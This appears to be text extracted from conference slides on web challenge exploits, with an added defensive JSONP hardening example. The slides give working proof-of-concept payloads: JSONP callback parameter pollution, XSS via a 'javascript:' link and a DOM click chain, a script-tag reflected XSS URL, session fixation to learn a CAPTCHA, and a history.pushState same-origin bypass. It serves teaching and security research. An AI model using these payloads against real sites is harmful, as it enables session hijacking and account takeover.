19. DT_VCS
#1. JSONP callback spoofing
/colorer.php?callback=loadCode&code=code&lang=php
Trying to set the lang value to “&callback=alert”…
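As an added, defender-side example (not code from the slides or from the target application): the callback selection a JSONP endpoint like colorer.php should perform, refusing the duplicated callback parameter that a smuggled lang value produces instead of letting last-value-wins parsing swap the callback. The function names, the allow-list and the sample query strings are assumptions.

```javascript
// Hardened callback handling for a JSONP endpoint (added example, assumptions:
// the allow-list and function names are constructed for illustration).
const ALLOWED_CALLBACKS = new Set(['loadCode']);   // names the page's own JS actually uses
const IDENT_RE = /^[A-Za-z_$][\w$]{0,63}$/;         // plain identifier: no dots, brackets or parens

// Returns { ok: true, callback } or { ok: false, reason }.
function selectJsonpCallback(queryString) {
  const params = new URLSearchParams(queryString);
  const values = params.getAll('callback');
  if (values.length === 0) return { ok: false, reason: 'missing callback' };
  // A repeated key is the fingerprint of parameter pollution: refuse rather than pick one.
  if (values.length > 1) return { ok: false, reason: 'duplicate callback' };
  const cb = values[0];
  if (!IDENT_RE.test(cb)) return { ok: false, reason: 'callback is not a plain identifier' };
  if (!ALLOWED_CALLBACKS.has(cb)) return { ok: false, reason: 'callback not in allow-list' };
  return { ok: true, callback: cb };
}

// Builds the JSONP response. JSON.stringify keeps payload data inside the call
// arguments; the leading comment and the headers stop the response from being
// reinterpreted as another content type.
function renderJsonp(queryString, payload) {
  const headers = {
    'Content-Type': 'application/javascript; charset=utf-8',
    'X-Content-Type-Options': 'nosniff',
  };
  const sel = selectJsonpCallback(queryString);
  if (!sel.ok) {
    return { status: 400, headers, body: JSON.stringify({ error: sel.reason }) };
  }
  return { status: 200, headers, body: `/**/${sel.callback}(${JSON.stringify(payload)});` };
}

// Constructed sample: the legitimate request and the polluted one from the slide.
console.log(renderJsonp('?callback=loadCode&code=code&lang=php', { code: 'x' }));
console.log(renderJsonp('?callback=loadCode&code=code&lang=php&callback=alert', { code: 'x' }));
```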
20. DT_VCS
#2. XSS via Reverse Clickjacking.
Post a link like:
“javascript:alert('PWN')”
And a callback like:
“document.body.firstChild.firstChild.nextSibling.firstChild.nextSibling.firstChild.click”
25. DT_VCS
It seems PHPSESSID is used to store the correct CAPTCHA value. So if we set our own PHPSESSID cookie in the admin's browser, we would know the correct CAPTCHA value.
40. Chrome tricks
And if we try something like this:
http://i_can_decode_something_like_this_"@pwny.in/reflector.php?data=<script>document.write(location)</script>
42. Chrome tricks
And now we need to bypass this:
if (XSS.sanitizeURL(location.href) !== location.href) {
location = 'about:blank';
}
How is that possible?
44. Chrome tricks
The main idea of the SOP bypass is very simple: just execute history.pushState in the context of another page, like this:
history.pushState.apply(
  frames[1].history,
  ['', '', payloaded_url]
);
// Fixed now